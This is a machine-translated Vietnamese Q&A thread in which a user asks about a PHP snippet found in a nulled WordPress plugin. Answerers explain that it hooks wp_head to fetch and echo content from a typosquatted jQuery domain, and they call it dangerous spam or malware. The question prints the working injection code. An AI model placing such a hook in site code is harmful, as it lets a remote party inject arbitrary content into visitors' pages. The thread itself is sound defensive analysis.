Tôi tìm thấy điều này trong một plugin. Nó làm gì? có nguy hiểm không

17

Tôi tìm thấy điều này trong một plugin. Nó làm gì? có nguy hiểm không

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins  wp-admin  security  curl 
Hoa hồng Sofia
nguồn
5
Đó là plugin nào?
Daniel
Bạn đã nhận được plugin từ trang web WP chính thức?
chàng người Brazil đó
1
Đây là một plugin mà một trong những khách hàng của tôi muốn tôi chạy trên cài đặt mạng của tôi. Plugin muốn chạy cái này trong wp-admin. Sau khi đọc xong tôi hỏi anh ấy đến từ đâu. Đây là một plugin nulled từ một torrent. Câu trả lời ngắn gọn là erm NO xXx
Sofia Rose

Câu trả lời:

16

Nó tải một khối đánh dấu có chứa thư rác (tôi nghĩ về việc đăng một chút nguồn nhưng tôi không muốn quảng cáo nội dung theo bất kỳ cách nào) từ một tên miền sai chính tả của tên miền-- http://jquery.com/- được sử dụng bởi jQuery , một thư viện Javascript có uy tín và phổ biến và một thư viện mà WordPress bao gồm trong Core. Tôi nghĩ ý tưởng là dường như đang tải thư viện đó, trong khi thực tế đang tải một cái gì đó rất khác.

Và đó là những cách khác để cố gắng tải jQuery. Chú ý tên biến $jquery.

Nó cũng có thể cố gắng tải các tập lệnh độc hại. Tôi đã không kiểm tra. Tôi sẽ chắc chắn gọi nó là nguy hiểm đặc biệt là kể từ khi nội dung trên trang đó có thể thay đổi bất cứ lúc nào lĩnh vực điều khiển có cảm giác như nó.

Tốt nhất là nó sẽ làm hỏng trang web của bạn khi các công cụ tìm kiếm xem thường các trang web phát tán thư rác.

Đừng sử dụng nó. Nó không có lợi cho bạn hoặc cho bất kỳ ai khác trên web ngoài những người điều hành trang web. Nếu bạn tìm thấy điều này trên một trang web có uy tín, hãy báo cáo cho họ.

s_ha_dum
nguồn
7

Vâng, đó là mã nguy hiểm, tải nội dung từ một trang web spam.

Bạn đã không đặt tên cho plugin, nhưng nếu bạn tìm thấy mã này sau khi được cài đặt trên trang web của mình, có thể mã plugin không đến từ nhà phát triển như thế này, nhưng thay vào đó đã bị hack sau khi được cài đặt. Nếu đây là trường hợp, bạn có thể tìm thấy mã độc trên nhiều trang web của bạn hơn là chỉ plugin này.

Kiểm tra mã plugin đã tải xuống từ bất cứ nơi nào bạn có plugin ban đầu và xem mã độc này có ở đó không. Nếu không, thì trang web của bạn đã bị hack. Nếu bạn xác định đó là trường hợp, hãy đọc bài viết này từ Codex .

Ben Miller - Tái lập Monica
nguồn
3
Đây là một plugin mà một trong những khách hàng của tôi muốn tôi chạy trên cài đặt mạng của tôi. Plugin muốn chạy cái này trong wp-admin. Sau khi đọc xong tôi hỏi anh ấy đến từ đâu. Đây là một plugin nulled từ một torrent. Câu trả lời ngắn gọn là erm NO xXx
Sofia Rose
Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.